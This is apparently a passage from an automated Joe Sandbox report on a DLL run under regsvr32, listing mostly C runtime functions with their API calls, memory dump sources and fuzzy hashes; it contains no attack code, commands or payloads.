                                                                                                • Associated: 00000003.00000002.1914837041.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6f950000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                • String ID:
                                                                                                • API String ID: 1703294689-0
                                                                                                • Opcode ID: 41b9b31108cba0d11bf0442ceb6e522d1cfa5f4c18075642e3d1fb3e050704f8
                                                                                                • Instruction ID: 56aa2e9e73a434e648341db88ae513337887d601ffda823a7a27e729d01ee67d
                                                                                                • Opcode Fuzzy Hash: 41b9b31108cba0d11bf0442ceb6e522d1cfa5f4c18075642e3d1fb3e050704f8
                                                                                                • Instruction Fuzzy Hash: 73D09E31004604ABEF016F64CC4C9993F2AAF453A97405418B9195A0B6CB75E971DF50
                                                                                                Function 6F951D7D Relevance: 3.1, APIs: 2, Instructions: 76COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • __RTC_Initialize.LIBCMT ref: 6F951DCA
                                                                                                  • Part of subcall function 6F95228C: InitializeSListHead.KERNEL32(6F967C70,6F951DD4,6F965708,00000010,6F951D65,?,?,?,6F951F8D,?,00000001,?,?,00000001,?,6F965750), ref: 6F952291
                                                                                                • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6F951E34
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1914644518.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914709536.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914777697.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914837041.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6f950000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                                • String ID:
                                                                                                • API String ID: 3231365870-0
                                                                                                • Opcode ID: f64e6f50f4502f81fd2f06a4c8b2b9356389a74d759160b0416409b9866f7635
                                                                                                • Instruction ID: dbd21dee974c30aa6a56cc72ae674814fda50462661509d0bfe32484781d4195
                                                                                                • Opcode Fuzzy Hash: f64e6f50f4502f81fd2f06a4c8b2b9356389a74d759160b0416409b9866f7635
                                                                                                • Instruction Fuzzy Hash: E12102329483119AFF06EFB8A40079C37A19F6372CF10045AD5842B1D3DF32E5B8C662
                                                                                                Function 6F95AE14 Relevance: 1.6, APIs: 1, Instructions: 89processCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • CreateProcessW.KERNELBASE(?,00000001,?,?,?,00000000,?,00000000,00000001,00000000,?,?,?,?,00000000,?), ref: 6F95AEC9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1914644518.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914709536.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914777697.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914837041.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6f950000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateProcess
                                                                                                • String ID:
                                                                                                • API String ID: 963392458-0
                                                                                                • Opcode ID: 7d3127d6624304a4445bd5d3e0ea33e57231481fe0f778f5d46cc567561e9e48
                                                                                                • Instruction ID: b6e68c8e5646865891fe3c2e813574348240ee4b87e30bb570054094d9295719
                                                                                                • Opcode Fuzzy Hash: 7d3127d6624304a4445bd5d3e0ea33e57231481fe0f778f5d46cc567561e9e48
                                                                                                • Instruction Fuzzy Hash: 433118B2C0121CAFDF02DFD9DD809DEBFB9BF18214F54412AE918B2291D7318A64DB65
                                                                                                Function 6F9578B8 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 395 6f9578b8-6f9578c3 396 6f9578c5-6f9578cf 395->396 397 6f9578d1-6f9578d7 395->397 396->397 398 6f957905-6f957910 call 6f956a7b 396->398 399 6f9578f0-6f957901 RtlAllocateHeap 397->399 400 6f9578d9-6f9578da 397->400 405 6f957912-6f957914 398->405 401 6f957903 399->401 402 6f9578dc-6f9578e3 call 6f95afb5 399->402 400->399 401->405 402->398 408 6f9578e5-6f9578ee call 6f9554c6 402->408 408->398 408->399
                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6F956705,00000001,00000364,00000000,FFFFFFFF,000000FF,?,?,6F956A80,6F9578AD), ref: 6F9578F9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1914644518.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914709536.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914777697.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914837041.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6f950000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: 11000175e47c4525117f2a653cde02841767236b2a8b14f2ebde905929f718b9
                                                                                                • Instruction ID: 1c8d16ceb53eaeee637e4d106c1a0a49eb170089cd0adb56380666566bff0a88
                                                                                                • Opcode Fuzzy Hash: 11000175e47c4525117f2a653cde02841767236b2a8b14f2ebde905929f718b9
                                                                                                • Instruction Fuzzy Hash: 8DF0B43160462DABEB26DA368844B9A3B5CAF43770B01C126EE149A1C1DB20E630C6B2

                                                                                                Non-executed Functions

                                                                                                Function 6F9525AB Relevance: 6.1, APIs: 4, Instructions: 73COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6F9525B7
                                                                                                • IsDebuggerPresent.KERNEL32 ref: 6F952683
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6F9526A3
                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 6F9526AD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1914644518.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914709536.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914777697.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914837041.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6f950000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                • String ID:
                                                                                                • API String ID: 254469556-0
                                                                                                • Opcode ID: 69cb469e2c0385887cfed3d60eb2c937eee9b5b471f515200a265a1b2e39c88d
                                                                                                • Instruction ID: 23ecd557c1dc805c03c3c6812459aa0a4d63baa913363ccb1acc5b8aa5697faf
                                                                                                • Opcode Fuzzy Hash: 69cb469e2c0385887cfed3d60eb2c937eee9b5b471f515200a265a1b2e39c88d
                                                                                                • Instruction Fuzzy Hash: 5E310775D053189BEB10DFA4C989BCCBBB8BF08304F1040AAE40DAB290EB719A94CF54
                                                                                                Function 6F957231 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 278COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1914644518.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914709536.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914777697.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914837041.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6f950000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                • String ID: PATH$\
                                                                                                • API String ID: 485612231-1896636505
                                                                                                • Opcode ID: bca75e8e3329abeb13bf99d4c11f562514c5c828cc0d022a51bcbe5aa6ad03ab
                                                                                                • Instruction ID: bfd6ba309fbbdd3e50862742368b1701835e2fdd745e023c654a87069aadc7be
                                                                                                • Opcode Fuzzy Hash: bca75e8e3329abeb13bf99d4c11f562514c5c828cc0d022a51bcbe5aa6ad03ab
                                                                                                • Instruction Fuzzy Hash: 0D911A7190430A9EEF15CF64DC40BEE7BB9AF56328F10851AE850AA1C2E771D771CB62
                                                                                                Function 6F9540D9 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 6F9541D6
                                                                                                • type_info::operator==.LIBVCRUNTIME ref: 6F9541F8
                                                                                                • ___TypeMatch.LIBVCRUNTIME ref: 6F954307
                                                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 6F9543D9
                                                                                                • _UnwindNestedFrames.LIBCMT ref: 6F95445D
                                                                                                • CallUnexpected.LIBVCRUNTIME ref: 6F954478
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1914644518.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914709536.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914777697.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914837041.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6f950000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                • String ID: csm$csm$csm
                                                                                                • API String ID: 2123188842-393685449
                                                                                                • Opcode ID: d72726c23ee046ae4ccc160110ea4db62a36ebe977963449e1ea24ba8276283f
                                                                                                • Instruction ID: d68dff75e1d19f502d277b8a782abd22065da85cd44a8ea43081635f370f0c4d
                                                                                                • Opcode Fuzzy Hash: d72726c23ee046ae4ccc160110ea4db62a36ebe977963449e1ea24ba8276283f
                                                                                                • Instruction Fuzzy Hash: 11B17A71C00209DFCF58CFA8D9A099EB7B9BF55318F10416AE8106B296D731EA72CF91
                                                                                                Function 6F95CD11 Relevance: 12.2, APIs: 8, Instructions: 248COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1914644518.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914709536.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914777697.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914837041.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6f950000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: __freea$__alloca_probe_16$Info
                                                                                                • String ID:
                                                                                                • API String ID: 127012223-0
                                                                                                • Opcode ID: 48d6ee9e6afdb0b9f02c7115d1f366bc5bf7881f417b5b1704fe9b91de0c74f7
                                                                                                • Instruction ID: 6427da8743cc68f813d9277217a5a15751a5b07a0a771e4bbca6e80389495599
                                                                                                • Opcode Fuzzy Hash: 48d6ee9e6afdb0b9f02c7115d1f366bc5bf7881f417b5b1704fe9b91de0c74f7
                                                                                                • Instruction Fuzzy Hash: D771E272A04305ABEF11CEB58C40BEF7BBA9F4A314F14015AED14BB2C1E735E92587A1
                                                                                                Function 6F953010 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 6F953047
                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 6F95304F
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 6F9530D8
                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 6F953103
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 6F953158
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1914644518.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914709536.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914777697.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914837041.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6f950000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                • String ID: csm
                                                                                                • API String ID: 1170836740-1018135373
                                                                                                • Opcode ID: 6dabe8bd651a882f88858d3b65ba6db7518de8536a96de84c1e85cadb246ec8b
                                                                                                • Instruction ID: ead23f0e58b78240c10f663c830149cce8d8a4e8ea26d57c37804581b3eba9f6
                                                                                                • Opcode Fuzzy Hash: 6dabe8bd651a882f88858d3b65ba6db7518de8536a96de84c1e85cadb246ec8b
                                                                                                • Instruction Fuzzy Hash: C7417234A00319ABDF10CF79C885E9EBBB6AF45368F108159E9149B3D2D732E925CF91
                                                                                                Function 6F95912D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,2C12E102,?,6F95923C,00000000,6F9510C9,00000000,00000000), ref: 6F9591EE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1914644518.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914709536.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914777697.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914837041.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6f950000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeLibrary
                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                • API String ID: 3664257935-537541572
                                                                                                • Opcode ID: f554dc15ddbba9cf125c6ce60cf5df5e1b206662ab8630a6768cee15615cc257
                                                                                                • Instruction ID: 1ede92d87e88183e7490bbb336172c1a1857d4a00e499d7b6d6ec4c2ecc552f4
                                                                                                • Opcode Fuzzy Hash: f554dc15ddbba9cf125c6ce60cf5df5e1b206662ab8630a6768cee15615cc257
                                                                                                • Instruction Fuzzy Hash: E821EB71909621ABFF31CB348D88A9A376D9F437B4F110615ED16A72C8D730F921CAE0
                                                                                                Function 6F953727 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(00000001,?,6F9531F1,6F952381,6F951D55,?,6F951F8D,?,00000001,?,?,00000001,?,6F965750,0000000C,6F952086), ref: 6F953735
                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6F953743
                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6F95375C
                                                                                                • SetLastError.KERNEL32(00000000,6F951F8D,?,00000001,?,?,00000001,?,6F965750,0000000C,6F952086,?,00000001,?), ref: 6F9537AE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1914644518.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914709536.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914777697.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914837041.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6f950000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                • String ID:
                                                                                                • API String ID: 3852720340-0
                                                                                                • Opcode ID: cc2281c019edd921d842ec66aee1f84c51d2aa2c758fc477ff1fb2002e255d74
                                                                                                • Instruction ID: 55fdda806f67d341de7e6315f8943b37e07243cf9b6803278666ec7b786dd641
                                                                                                • Opcode Fuzzy Hash: cc2281c019edd921d842ec66aee1f84c51d2aa2c758fc477ff1fb2002e255d74
                                                                                                • Instruction Fuzzy Hash: 4F01F773A2CB115EBB1095B8ACD7E6A276ADB07779720032EE130D50E1EF51D835AA90
                                                                                                Function 6F957FBD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • C:\Windows\SysWOW64\regsvr32.exe, xrefs: 6F957FD9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1914644518.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914709536.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914777697.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914837041.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6f950000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: C:\Windows\SysWOW64\regsvr32.exe
                                                                                                • API String ID: 0-3922119987
                                                                                                • Opcode ID: a14bb15c37d60a286f0625b893b28e2a2e57ec3d5e5a9c851fc281ae84d76adb
                                                                                                • Instruction ID: 1597c5ab29c6056f2b844a429e15773aa7f25723b31fc11314ad33efb6e76bb7
                                                                                                • Opcode Fuzzy Hash: a14bb15c37d60a286f0625b893b28e2a2e57ec3d5e5a9c851fc281ae84d76adb
                                                                                                • Instruction Fuzzy Hash: 9D219D71218606AFEB24DFB5888099B77ADEF113687008918E919DB1D1EB30EC258BA0
                                                                                                Function 6F953C69 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,6F953D2A,00000000,?,00000001,00000000,?,6F953DA1,00000001,FlsFree,6F960E2C,FlsFree,00000000), ref: 6F953CF9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1914644518.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914709536.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914777697.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914837041.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6f950000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeLibrary
                                                                                                • String ID: api-ms-
                                                                                                • API String ID: 3664257935-2084034818
                                                                                                • Opcode ID: ad7b35e693053ff004a6380ad2c70a82dd44f2e5e314501ec7917911fc46011e
                                                                                                • Instruction ID: bf6d080421070cce3ce2d0b880099514b46054195cae0c3e3f03cb59de10071a
                                                                                                • Opcode Fuzzy Hash: ad7b35e693053ff004a6380ad2c70a82dd44f2e5e314501ec7917911fc46011e
                                                                                                • Instruction Fuzzy Hash: 2511A771A44621ABFF22CB78C942F5937A9AF02770F100215ED11AB1C0D770F920C6D5
                                                                                                Function 6F9552BE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,2C12E102,?,?,00000000,6F95F92D,000000FF,?,6F955258,?,?,6F95522C,00000000), ref: 6F9552F3
                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6F955305
                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,6F95F92D,000000FF,?,6F955258,?,?,6F95522C,00000000), ref: 6F955327
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1914644518.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914709536.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914777697.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914837041.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6f950000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                • API String ID: 4061214504-1276376045
                                                                                                • Opcode ID: 86b17386e015d26b04162c864e44e22a488c0b66bee0cc5689ba68fc4fc320da
                                                                                                • Instruction ID: a2a5d3eee320de7d7d6efa6493a3a3008c493e11d049b6108d2eb59632f2bbfb
                                                                                                • Opcode Fuzzy Hash: 86b17386e015d26b04162c864e44e22a488c0b66bee0cc5689ba68fc4fc320da
                                                                                                • Instruction Fuzzy Hash: 23014471918919EBEF028B54CC44BBE7BB9FB45724F00062AF921E22D4DB75D910CA50
                                                                                                Function 6F95B654 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • __alloca_probe_16.LIBCMT ref: 6F95B6D9
                                                                                                • __alloca_probe_16.LIBCMT ref: 6F95B7A2
                                                                                                • __freea.LIBCMT ref: 6F95B809
                                                                                                  • Part of subcall function 6F95786A: HeapAlloc.KERNEL32(00000000,00000000,?,?,6F951CD5,00000000,?,6F95175C,00000000,?,6F9510C9,00000000), ref: 6F95789C
                                                                                                • __freea.LIBCMT ref: 6F95B81C
                                                                                                • __freea.LIBCMT ref: 6F95B829
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1914644518.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914709536.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914777697.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914837041.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6f950000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1096550386-0
                                                                                                • Opcode ID: 50eb4319f89d205e16c88159eb3cdaf39520fe7941bd2d0c6b472fdfcfb26144
                                                                                                • Instruction ID: 15b4db24f0c52991273d2f291cd5d2957f38f049bf9de9cdec2bb3f98edc1308
                                                                                                • Opcode Fuzzy Hash: 50eb4319f89d205e16c88159eb3cdaf39520fe7941bd2d0c6b472fdfcfb26144
                                                                                                • Instruction Fuzzy Hash: 7C51A3729012066BEB18CE65DC80EBB7ABDDF94714F154129FE14DA1D1EB31EC6186A0
                                                                                                Function 6F95BDF6 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetConsoleOutputCP.KERNEL32(2C12E102,00000000,00000000,?), ref: 6F95BE59
                                                                                                  • Part of subcall function 6F958B8B: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6F95B7FF,?,00000000,-00000008), ref: 6F958BEC
                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6F95C0AB
                                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6F95C0F1
                                                                                                • GetLastError.KERNEL32 ref: 6F95C194
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1914644518.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914709536.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914777697.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914837041.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6f950000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                • String ID:
                                                                                                • API String ID: 2112829910-0
                                                                                                • Opcode ID: b2a688838fe8bf3955c95837d872743bc7241829b9ad8106a464be17ba41a4c7
                                                                                                • Instruction ID: 5b3195121e167717b88fb6d5c62fec892058d9986fe1edb15ec81f1ed54de01d
                                                                                                • Opcode Fuzzy Hash: b2a688838fe8bf3955c95837d872743bc7241829b9ad8106a464be17ba41a4c7
                                                                                                • Instruction Fuzzy Hash: E5D18A75D042589FDF15CFA8C8809EDBBB8EF0A314F14812AE855AB291D730E952CF50
                                                                                                Function 6F953E82 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1914644518.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914709536.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
